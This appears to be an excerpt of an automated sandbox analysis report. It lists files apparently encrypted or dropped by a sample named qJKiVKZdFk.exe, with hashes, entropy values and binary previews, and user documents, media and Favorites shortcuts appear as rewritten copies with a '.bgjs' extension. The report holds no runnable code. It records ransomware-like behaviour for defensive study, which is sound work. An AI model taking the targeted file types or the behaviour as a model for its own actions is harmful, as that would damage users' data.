                                                                                                                                      Preview:NYMMP......~.{.m...u~...+.z ...2.S4Hd.*.{C...h[..^.r+...[.nvO.;=....j..K....s..%.'W...c..c-.AG..i..lW|..5..`Eb;..c...K.. .....O.#,A.T.Y .........Rw...&^`.._.;30v2...ah.Y...;.t..a;......_.u.8o.:....F.P..&;..T/..gz3.G....9.7..b...$...".U.x..../T.#......G$....0.:mq.s..;.Ak.v.Yzl.."I.U..k.-1.>.B.....i[....E|...H.*..b0.;t.Z.j.aj..+%..aBr.(...T....-X. .k.......".`..D).88e.S.ne......0.t.p...{dA.N%].-....E.jvTG../.... 6...E?..".&Ww..'_.1.......Q0X.%..S...X..%Bc/.C~....d.....v.Z5.e...U%m....y....e...3..r.).8..`...gN..SKR...lB..^.Hj.Z...'.y.Q..$...4...v....k.Bh....j..V..E.!.~.s.d...B..E*..+...v.........JOX.$;...U:.9@"H/....n......p..&.M/He..C.f"....k.O....A...~....j4Gi.\.;.dE.....XV4....=k...\Eb]..Sc..>......w.u.#...qh.s..v..F..._8.'.kk>....o.....Cv......%.+.....c1....]./...<.p._.Y...K..d|."z...L./..'...f..e...vx..X..Q.q.H(...(.E...[1kU.S.'C.1.xZ$)>.[-h..Q.a.....I......1.,..^2....<$./Y.q^....H*H*.G...k.k9.V..P1...^..._..q7.......5........@...J

                                                                                                                                      C:\Users\user\Downloads\NYMMPCEIMA.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.855454543080393
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ny4NozqTcrVvowI7+CDPy3GwrreNsYCbsPxeelYhAim3CQJjeo6xIUbD:ymoWF7+CDPy3GerlYCbsPdl2AimdJjk/
                                                                                                                                      MD5:0AB7812501047AB05AF20244673ACC2E
                                                                                                                                      SHA1:22F9636471CED0C4D5984ED4C65525517DD5BACD
                                                                                                                                      SHA-256:AE6DB261E30EABE228FE9C7210A6587D18973B4A719AE1CB92D22DC9F7B6F93F
                                                                                                                                      SHA-512:59CCBDF6A983524048A85A129FD2416F93AEFB8A6D7E9F8EB1DA9CD2A9683180E74E9A17FD5215B336B1CD7FA6009F8BAC2557A50B38BD10483F0B55CF26A326
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMPMY..{.L:N..j&..,..p..v.=8.s. ...6..N.Io..[..........5a.<`]I........RugZ.:...(........Bh8.C..)?...T..2...w.D..J....$N.N........K.5.EX...o...A..t.L.C.Yx......U.b._.o"....\~..H.......g9..=.*.T~~S..<.X.O.J.0....UM'.;_...Z...F*.T1....oe....tJ2.=s....+0..[....*}Nm......W..}C;O..&g..>...7.8Az.rF....I..g...h..E.......J.(.k....r.q.......-..^.."$..G.6.U...yB_..l..j.gw..Y......u?...(..P.....~.*..l...q..+.F...t...8...K'..N.Q.......`.._\y...!_f....nP..R-.-....##EH.X...`.c.......=z....O..>..... .0.p....q..<.j....4_k...&4.{....y.C...[U..f..".J.....,..<..4,q...".C.<@h1.H..a?...x.."*!...d..L.?N....~_..CB......KfrL.;,....9.[.&"...........;T...m}..[..%.Nr;......v3.!u...G..."T.*>N.......n..o_B...K.}p..*..G..}*.e.._......s.b........./......l..2y..&.Nrx...*...(...=..+c..S)0..2.J...p...W.:c@2CT..Xs.9V......D..Gz.qjc.......m..RK,.l..4D..q..%..ea.`..9.....i..g~*...6.;p.....l....$.._.D9...c..e.]..........;F..Z2E..v.v..\...A......<.6....................8...

                                                                                                                                      C:\Users\user\Downloads\NYMMPCEIMA.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.855454543080393
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ny4NozqTcrVvowI7+CDPy3GwrreNsYCbsPxeelYhAim3CQJjeo6xIUbD:ymoWF7+CDPy3GerlYCbsPdl2AimdJjk/
                                                                                                                                      MD5:0AB7812501047AB05AF20244673ACC2E
                                                                                                                                      SHA1:22F9636471CED0C4D5984ED4C65525517DD5BACD
                                                                                                                                      SHA-256:AE6DB261E30EABE228FE9C7210A6587D18973B4A719AE1CB92D22DC9F7B6F93F
                                                                                                                                      SHA-512:59CCBDF6A983524048A85A129FD2416F93AEFB8A6D7E9F8EB1DA9CD2A9683180E74E9A17FD5215B336B1CD7FA6009F8BAC2557A50B38BD10483F0B55CF26A326
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMPMY..{.L:N..j&..,..p..v.=8.s. ...6..N.Io..[..........5a.<`]I........RugZ.:...(........Bh8.C..)?...T..2...w.D..J....$N.N........K.5.EX...o...A..t.L.C.Yx......U.b._.o"....\~..H.......g9..=.*.T~~S..<.X.O.J.0....UM'.;_...Z...F*.T1....oe....tJ2.=s....+0..[....*}Nm......W..}C;O..&g..>...7.8Az.rF....I..g...h..E.......J.(.k....r.q.......-..^.."$..G.6.U...yB_..l..j.gw..Y......u?...(..P.....~.*..l...q..+.F...t...8...K'..N.Q.......`.._\y...!_f....nP..R-.-....##EH.X...`.c.......=z....O..>..... .0.p....q..<.j....4_k...&4.{....y.C...[U..f..".J.....,..<..4,q...".C.<@h1.H..a?...x.."*!...d..L.?N....~_..CB......KfrL.;,....9.[.&"...........;T...m}..[..%.Nr;......v3.!u...G..."T.*>N.......n..o_B...K.}p..*..G..}*.e.._......s.b........./......l..2y..&.Nrx...*...(...=..+c..S)0..2.J...p...W.:c@2CT..Xs.9V......D..Gz.qjc.......m..RK,.l..4D..q..%..ea.`..9.....i..g~*...6.;p.....l....$.._.D9...c..e.]..........;F..Z2E..v.v..\...A......<.6....................8...

                                                                                                                                      C:\Users\user\Downloads\QCOILOQIKC.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.860267656992954
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ROLPS0+19I7bwPFAYXvrPCIL5Dr7gMrfXDGyEeAuk7fWNnduT+bD:ULPShI7bKFAYLCILdr7eyEeANOZhD
                                                                                                                                      MD5:C1088C6F6120D34EE91129EDF9C9A3CC
                                                                                                                                      SHA1:713F94BB0D773B435602EB55BF1F1EB8B74F2158
                                                                                                                                      SHA-256:1966B4B1C5655E309458EA04B74FF5FF30434582DFEFB0FC383540E084E5312F
                                                                                                                                      SHA-512:3663313A461AD187BDCC44E980568AA2668E8AB754B30FD4612F047BDAE9BEFDFD1D2FE6407D824732BDC7335EC00974CF19FF7436D555DD60A9F77E23983FA5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL9j.....@../|.=.s..L.H.s....:\....k8D.8Q....~..7...<.FsuzMz....i..w.>...Q.6..t.Im:....~Q..0..x2A......H...D...9...a2.2...&.y.mD.g.....x.D.|W.?..*..e...4h..=.\.h."......L[...;a7K6........5d....RA..`_...NW.<...L....O'.s.Dh.\.;....[.+9/.....c".D.R..wwo..AI.-..*_ .l..k..\....q.l........q.......-.AK..9........h^..G.....z..,...uIO....`..o..-......Z.%V...m(._...b.0..^......W.q..d3!|.F.o...^.Z...g..i.>..f.............~..#v...8...6...W..}..?....#..(.~`.cpF..J,y.'..MI.\..N..a|.p:.+I..[.I.JM.!?w>]...[...L....*.....].G..;.l.T.A..h%.~d(...0..._5`u.dzZuJ-U..W....D.9..F;.%.w....0R..v..E...S.......".G,.......x.O.......\K..Q:.F.Ob.......,H........ ...`.o....Ch'....ER...@.}la?...M6-..<..f.=pIeCV....}..][W~?}....Q..V^.....@..\s^....bm..{$........`(.%...1&...o.q..m.......8m".4].@>... X.w.3LB..J<.|.X..b..0C[.....p.=8Y.F....T|.....P.]..C.+...5\n..B..g..zO....9..|8..M.}...&....B.....\>..m....2g.>.5.l.L..-...<=..8.x....J.Vt.....;...).p~...{.).. y.

                                                                                                                                      C:\Users\user\Downloads\QCOILOQIKC.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.860267656992954
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ROLPS0+19I7bwPFAYXvrPCIL5Dr7gMrfXDGyEeAuk7fWNnduT+bD:ULPShI7bKFAYLCILdr7eyEeANOZhD
                                                                                                                                      MD5:C1088C6F6120D34EE91129EDF9C9A3CC
                                                                                                                                      SHA1:713F94BB0D773B435602EB55BF1F1EB8B74F2158
                                                                                                                                      SHA-256:1966B4B1C5655E309458EA04B74FF5FF30434582DFEFB0FC383540E084E5312F
                                                                                                                                      SHA-512:3663313A461AD187BDCC44E980568AA2668E8AB754B30FD4612F047BDAE9BEFDFD1D2FE6407D824732BDC7335EC00974CF19FF7436D555DD60A9F77E23983FA5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL9j.....@../|.=.s..L.H.s....:\....k8D.8Q....~..7...<.FsuzMz....i..w.>...Q.6..t.Im:....~Q..0..x2A......H...D...9...a2.2...&.y.mD.g.....x.D.|W.?..*..e...4h..=.\.h."......L[...;a7K6........5d....RA..`_...NW.<...L....O'.s.Dh.\.;....[.+9/.....c".D.R..wwo..AI.-..*_ .l..k..\....q.l........q.......-.AK..9........h^..G.....z..,...uIO....`..o..-......Z.%V...m(._...b.0..^......W.q..d3!|.F.o...^.Z...g..i.>..f.............~..#v...8...6...W..}..?....#..(.~`.cpF..J,y.'..MI.\..N..a|.p:.+I..[.I.JM.!?w>]...[...L....*.....].G..;.l.T.A..h%.~d(...0..._5`u.dzZuJ-U..W....D.9..F;.%.w....0R..v..E...S.......".G,.......x.O.......\K..Q:.F.Ob.......,H........ ...`.o....Ch'....ER...@.}la?...M6-..<..f.=pIeCV....}..][W~?}....Q..V^.....@..\s^....bm..{$........`(.%...1&...o.q..m.......8m".4].@>... X.w.3LB..J<.|.X..b..0C[.....p.=8Y.F....T|.....P.]..C.+...5\n..B..g..zO....9..|8..M.}...&....B.....\>..m....2g.>.5.l.L..-...<=..8.x....J.Vt.....;...).p~...{.).. y.

                                                                                                                                      C:\Users\user\Downloads\VWDFPKGDUF.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.872660605908364
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:lQ5OEGFX7cwTa2uxg7wL1mkSOqOhtUtSdRaWSRUU1cC7rPR5U0TcW/Z25bD:lIyJYwTmobOD8+FS/b7V5UfWg5D
                                                                                                                                      MD5:C4629EAC352B750B86DB961E0542C603
                                                                                                                                      SHA1:F91D4260906C9D3665F9788D9350F56AF6A7B3ED
                                                                                                                                      SHA-256:180C2AC44487540C7F7F2DDBC1041B0EC9C50F759F51B88F265DF84B40EEACE6
                                                                                                                                      SHA-512:E0910342FE76A386189B22F625270B1AF52EB2C05562BFD1AAE2E2C127625F63D6667A00582C8EE1D7D784E3AA680300F577C957AE03B17C6FC502F3A5EF2EB8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFPuJ.+q.d.B..q/...7p.b....I1.#..`7..s.8..$9..P.|.2.~...Y.6?+n.3.q...y...z....Md......V...$S.w....;...].'...X.x...y.j.f...O....05.c>... Z....fA.........?.............l..X......f.g.mR.w*..Cq....h.{.~...........^WgN:../.pYf....e."..GY..A..n..u..O.$.G.nz..f.t....0.Y$..S|..#..W.D.g;.?..C.A..H...Z...C.}2].~.....P........M...=Y.h"nf.4S..N....0.....?)(b....(..oF..$...\.g........,&nYK.2.......w..-..T.d...,..C..'..........|..<....y./Xz....)..Q.:.B8Y.+'.=x.....Y..;....U.*..\.`Ps...i.e%.7.J...._...hq.m.u.-.*\G...h..a. P.y......v..!..K&.~..5.w....'.3..|z4'..R..T.....N..y.{..7..yt...@......,.-_(.G_|..L...r.....&...w....Ea.vYJ.....r...7G..)Q..i.U......qU..c.S..f..'.....P%m.....@..;J..7.....h.....-7...kJ..f..&^]....Dq..@....kk]....0..o.lAa`BoJ.._.[.[D.J]...@/..]!..x..I6Z..V.../.k.L...gZk...|.(.q..G.Z..K.g..r...@b.!.^|.Sh.\.^v........./E..s.!Z|xB..c"...0..j...9i.t..&TT..4\.ncG..n.A.......>K.....a.............?.3\../..=o............X..3(......}r..

                                                                                                                                      C:\Users\user\Downloads\VWDFPKGDUF.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.872660605908364
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:lQ5OEGFX7cwTa2uxg7wL1mkSOqOhtUtSdRaWSRUU1cC7rPR5U0TcW/Z25bD:lIyJYwTmobOD8+FS/b7V5UfWg5D
                                                                                                                                      MD5:C4629EAC352B750B86DB961E0542C603
                                                                                                                                      SHA1:F91D4260906C9D3665F9788D9350F56AF6A7B3ED
                                                                                                                                      SHA-256:180C2AC44487540C7F7F2DDBC1041B0EC9C50F759F51B88F265DF84B40EEACE6
                                                                                                                                      SHA-512:E0910342FE76A386189B22F625270B1AF52EB2C05562BFD1AAE2E2C127625F63D6667A00582C8EE1D7D784E3AA680300F577C957AE03B17C6FC502F3A5EF2EB8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFPuJ.+q.d.B..q/...7p.b....I1.#..`7..s.8..$9..P.|.2.~...Y.6?+n.3.q...y...z....Md......V...$S.w....;...].'...X.x...y.j.f...O....05.c>... Z....fA.........?.............l..X......f.g.mR.w*..Cq....h.{.~...........^WgN:../.pYf....e."..GY..A..n..u..O.$.G.nz..f.t....0.Y$..S|..#..W.D.g;.?..C.A..H...Z...C.}2].~.....P........M...=Y.h"nf.4S..N....0.....?)(b....(..oF..$...\.g........,&nYK.2.......w..-..T.d...,..C..'..........|..<....y./Xz....)..Q.:.B8Y.+'.=x.....Y..;....U.*..\.`Ps...i.e%.7.J...._...hq.m.u.-.*\G...h..a. P.y......v..!..K&.~..5.w....'.3..|z4'..R..T.....N..y.{..7..yt...@......,.-_(.G_|..L...r.....&...w....Ea.vYJ.....r...7G..)Q..i.U......qU..c.S..f..'.....P%m.....@..;J..7.....h.....-7...kJ..f..&^]....Dq..@....kk]....0..o.lAa`BoJ.._.[.[D.J]...@/..]!..x..I6Z..V.../.k.L...gZk...|.(.q..G.Z..K.g..r...@b.!.^|.Sh.\.^v........./E..s.!Z|xB..c"...0..j...9i.t..&TT..4\.ncG..n.A.......>K.....a.............?.3\../..=o............X..3(......}r..

                                                                                                                                      C:\Users\user\Downloads\ZIPXYXWIOY.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.831194974645128
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GmF8wLlkSzEUEXFh2/mXZ0VYUIoBUt7MIma65TJpVXHuj/Wf6DWoCjjGGZbD:GmF3L2SzlEz4mpnMg7Lmx/pds/Kb/ZD
                                                                                                                                      MD5:720B2E81EA6B863AA909B5E7C1E1FFF2
                                                                                                                                      SHA1:736270DD61A93403F75D7286B5C7D6A2F62ABABC
                                                                                                                                      SHA-256:C573430B83FBB89DC5A7246B8FCEAE69290942185C6BCA520832E0DE4F480391
                                                                                                                                      SHA-512:161EBB8B959ADC0569FCF8CFCD6AA0773B4122A306D66C775A0B9460BED884F69C2131D935F0D600D3E1321BB8D2C8441C6EF8531634BB412B6DF0958F0A9E6D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY.2F\.UE....[.....BA\f......(..#.....#.WYa...Q.....(g^.....P....!.. ...{....mQ.H..C..Ek..H.Y>!.3.z:>..~...wt..A.*t...[$.0..Gg^.......w._]G=...@zo)`.A$&........r'..........mh..%.x>.G#..*..~@`....(...'>.y..ou.z..\.Y(j.K. .b..@.F...1.y...B..w.$p..VT&r.H....=K..kMB.6f..DU.N.UN..$E..C.j....2..x.....7S?j_.t...s.<...m.1.Q;.@........$[....YH.[....X......h.Jc`...t........Z4.....:..>w.......'.3...KR..$#G....m.Y.r.0...!..._.)w.=>P....[...L.^.^..E@m...8..v~......$.-.n....d....;jj....(.`xtC:.....w.~.r.e..>...'.$.[...x...JE.m..~T....t=b......-t.>...v..+Q...r&".a^a.o.1iN..&90`N_7g ..*.4...+.>.....S.%q.h]..;(.t..)..G[d.o..)?.6.>`ul..zbD.o'.w.>..A......r....^.T.[l..H.....,.0...;P...TU.b./_..};...[X5s........Jk.u...e.;_..W....}...-..d_......o-.9....)...zu.....x....h"..*{K......+..l.......F?WeF%j...G.'.N.0.4.YKG..E.....UB.D...............n........3k.>....|....)-CY...r'l#...k.N.._..\{.....L../V...~3.j.d-].U.p.vL..%....=..hV..a..F...7_..V......

                                                                                                                                      C:\Users\user\Downloads\ZIPXYXWIOY.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.831194974645128
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GmF8wLlkSzEUEXFh2/mXZ0VYUIoBUt7MIma65TJpVXHuj/Wf6DWoCjjGGZbD:GmF3L2SzlEz4mpnMg7Lmx/pds/Kb/ZD
                                                                                                                                      MD5:720B2E81EA6B863AA909B5E7C1E1FFF2
                                                                                                                                      SHA1:736270DD61A93403F75D7286B5C7D6A2F62ABABC
                                                                                                                                      SHA-256:C573430B83FBB89DC5A7246B8FCEAE69290942185C6BCA520832E0DE4F480391
                                                                                                                                      SHA-512:161EBB8B959ADC0569FCF8CFCD6AA0773B4122A306D66C775A0B9460BED884F69C2131D935F0D600D3E1321BB8D2C8441C6EF8531634BB412B6DF0958F0A9E6D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY.2F\.UE....[.....BA\f......(..#.....#.WYa...Q.....(g^.....P....!.. ...{....mQ.H..C..Ek..H.Y>!.3.z:>..~...wt..A.*t...[$.0..Gg^.......w._]G=...@zo)`.A$&........r'..........mh..%.x>.G#..*..~@`....(...'>.y..ou.z..\.Y(j.K. .b..@.F...1.y...B..w.$p..VT&r.H....=K..kMB.6f..DU.N.UN..$E..C.j....2..x.....7S?j_.t...s.<...m.1.Q;.@........$[....YH.[....X......h.Jc`...t........Z4.....:..>w.......'.3...KR..$#G....m.Y.r.0...!..._.)w.=>P....[...L.^.^..E@m...8..v~......$.-.n....d....;jj....(.`xtC:.....w.~.r.e..>...'.$.[...x...JE.m..~T....t=b......-t.>...v..+Q...r&".a^a.o.1iN..&90`N_7g ..*.4...+.>.....S.%q.h]..;(.t..)..G[d.o..)?.6.>`ul..zbD.o'.w.>..A......r....^.T.[l..H.....,.0...;P...TU.b./_..};...[X5s........Jk.u...e.;_..W....}...-..d_......o-.9....)...zu.....x....h"..*{K......+..l.......F?WeF%j...G.'.N.0.4.YKG..E.....UB.D...............n........3k.>....|....)-CY...r'l#...k.N.._..\{.....L../V...~3.j.d-].U.p.vL..%....=..hV..a..F...7_..V......

                                                                                                                                      C:\Users\user\Favorites\Amazon.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):445
                                                                                                                                      Entropy (8bit):7.514758943077387
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:vBWXivG4sdTTGG8/nGKw2Ykb+ukIcii9a:5WXivGldTyG+nGUbD
                                                                                                                                      MD5:E15555EA4464A24EF9E25BDE80181B80
                                                                                                                                      SHA1:CEB46E1B4FA01F2AB4EB8B73AEAFDAAF04CD98D1
                                                                                                                                      SHA-256:353208DCD040BD12A125490E8EA994E6EBD2B85495994ABEBCA655ECC46030DD
                                                                                                                                      SHA-512:B0CECD09B7E8969D0CA04681A6E24BFC06362654513AC5CD8D234CFECC3662AFE9DA895758ABD3E7940F90EBEACFAC9F22FE119E2120851627087EE78C007327
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000.. 0.>...K.r.|....3<+WRV9.y.gN.....G.}.3.0f.].+F.l:.g3.J......b.....*......z`.7...L..CD..|..7B..?@..............y..<.t...o..%.,...H'..xt*q............>....... ..1.....-...X....8.,..I..e..L.U%.'{.H3!....H.....%..(..8...;..Uh.i*..o.R%+...y..;..@..L.<..f(..4..!......v.v.`..]u..a...u^...!_...nwW........S1.>.H......!..E.T....8^j..G..r{.....3.L..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Amazon.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):445
                                                                                                                                      Entropy (8bit):7.514758943077387
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:vBWXivG4sdTTGG8/nGKw2Ykb+ukIcii9a:5WXivGldTyG+nGUbD
                                                                                                                                      MD5:E15555EA4464A24EF9E25BDE80181B80
                                                                                                                                      SHA1:CEB46E1B4FA01F2AB4EB8B73AEAFDAAF04CD98D1
                                                                                                                                      SHA-256:353208DCD040BD12A125490E8EA994E6EBD2B85495994ABEBCA655ECC46030DD
                                                                                                                                      SHA-512:B0CECD09B7E8969D0CA04681A6E24BFC06362654513AC5CD8D234CFECC3662AFE9DA895758ABD3E7940F90EBEACFAC9F22FE119E2120851627087EE78C007327
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000.. 0.>...K.r.|....3<+WRV9.y.gN.....G.}.3.0f.].+F.l:.g3.J......b.....*......z`.7...L..CD..|..7B..?@..............y..<.t...o..%.,...H'..xt*q............>....... ..1.....-...X....8.,..I..e..L.U%.'{.H3!....H.....%..(..8...;..Uh.i*..o.R%+...y..;..@..L.<..f(..4..!......v.v.`..]u..a...u^...!_...nwW........S1.>.H......!..E.T....8^j..G..r{.....3.L..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Bing.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):542
                                                                                                                                      Entropy (8bit):7.558667926830201
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:8xJ9BqmMePpaMx2r8JxXZeE1bL+D7o1InukIcii9a:8xbkiP708Jx7Fws1IMbD
                                                                                                                                      MD5:5E2AC03B7625F275FD80858C6C3568F6
                                                                                                                                      SHA1:44D402FC9F319001FEB0EF0261C875C06738D2F7
                                                                                                                                      SHA-256:CC4B495AE05CCDEF6E0ACDFC8E386E10C3650779A1727B7CDDC55FB9401C269A
                                                                                                                                      SHA-512:358256F87EFBCDE9FE786FB2F671CBEC1175F7F5D3766E80B592C9BC69A86DA10547B03565F6787AA5608C9F93BC4FB2024E493866B6FCC24ABF3F808AB380A5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000..O.7<.;3h2.2>S...*.....}..=."...=.^@..S..B.G?..+...mn..H`z...xIC.+ ..l.._...o..L.......)0.V..~:ML-Qw.J...kS.y.!u..5...1F.........h....H<D.......X...$..2..(.......f...c.....P...U.....i.&.;?...z.x.rG6a......s..@....(.)..+>(..x.b..fw....S.....f..y.>D.2..^0.6$..z.....T-.....a.`^.....\..|$.^.O..m.r.....g.v.m...5r.MC.a*W./.?.dm6...n.yl......K...x._n2W.....B@.....;.^..% ~.<..U.lC...@>..`{v?.UJ+..^..B......s.....z>..;.......}.q..|.4.ee.?tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Bing.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):542
                                                                                                                                      Entropy (8bit):7.558667926830201
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:8xJ9BqmMePpaMx2r8JxXZeE1bL+D7o1InukIcii9a:8xbkiP708Jx7Fws1IMbD
                                                                                                                                      MD5:5E2AC03B7625F275FD80858C6C3568F6
                                                                                                                                      SHA1:44D402FC9F319001FEB0EF0261C875C06738D2F7
                                                                                                                                      SHA-256:CC4B495AE05CCDEF6E0ACDFC8E386E10C3650779A1727B7CDDC55FB9401C269A
                                                                                                                                      SHA-512:358256F87EFBCDE9FE786FB2F671CBEC1175F7F5D3766E80B592C9BC69A86DA10547B03565F6787AA5608C9F93BC4FB2024E493866B6FCC24ABF3F808AB380A5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000..O.7<.;3h2.2>S...*.....}..=."...=.^@..S..B.G?..+...mn..H`z...xIC.+ ..l.._...o..L.......)0.V..~:ML-Qw.J...kS.y.!u..5...1F.........h....H<D.......X...$..2..(.......f...c.....P...U.....i.&.;?...z.x.rG6a......s..@....(.)..+>(..x.b..fw....S.....f..y.>D.2..^0.6$..z.....T-.....a.`^.....\..|$.^.O..m.r.....g.v.m...5r.MC.a*W./.?.dm6...n.yl......K...x._n2W.....B@.....;.^..% ~.<..U.lC...@>..`{v?.UJ+..^..B......s.....z>..;.......}.q..|.4.ee.?tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Facebook.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):447
                                                                                                                                      Entropy (8bit):7.472504050625729
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:AVmDk7i5mBs1ShlsLJdlxkR4PrMm9zz/uDeSDb0ukIcii9a:AMA3Bs1ShluJq+w83LSDbPbD
                                                                                                                                      MD5:2B7658EFE9F1D1F5617031B374038CAD
                                                                                                                                      SHA1:C8BD0FE5F07288DDBD4E22DF2750D45BF7ACB005
                                                                                                                                      SHA-256:79BFF4BD318C5D6B7C926C7A2E25291DE42E203ABF7A98F92CA2E8AE6473BE2C
                                                                                                                                      SHA-512:8A8DD31BA82CFA72F24EDD9B03083855FFB8ECC616ED4DFB1A7E55076BAEE77259F71F556320790DDB9B07EE60D307197C66364C2213E6F8D09A860DBBDE6252
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000Xn.A..*..b....I.a..K.OeO*.3C...DM....'....xa.%.6-.D.....X.xh.z`.<.S2..t..t..&..*;....M.`j.F.....P2b.w...D.H.....(.GMm........$...J.....wX..."..D...E.Z.Z.B....e........k.)!.Qz.._:{.n1...X......})...4..k......3$....Z.L`...B..T?>..3].sH._..^..U.............Kr.N.k.YH....N....q...[.b*E...&.....y...:.hz;..Wr&.R..BA..m...N.~.....OV.....:....u.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Facebook.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):447
                                                                                                                                      Entropy (8bit):7.472504050625729
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:AVmDk7i5mBs1ShlsLJdlxkR4PrMm9zz/uDeSDb0ukIcii9a:AMA3Bs1ShluJq+w83LSDbPbD
                                                                                                                                      MD5:2B7658EFE9F1D1F5617031B374038CAD
                                                                                                                                      SHA1:C8BD0FE5F07288DDBD4E22DF2750D45BF7ACB005
                                                                                                                                      SHA-256:79BFF4BD318C5D6B7C926C7A2E25291DE42E203ABF7A98F92CA2E8AE6473BE2C
                                                                                                                                      SHA-512:8A8DD31BA82CFA72F24EDD9B03083855FFB8ECC616ED4DFB1A7E55076BAEE77259F71F556320790DDB9B07EE60D307197C66364C2213E6F8D09A860DBBDE6252
                                                                                                                                      Malicious:false
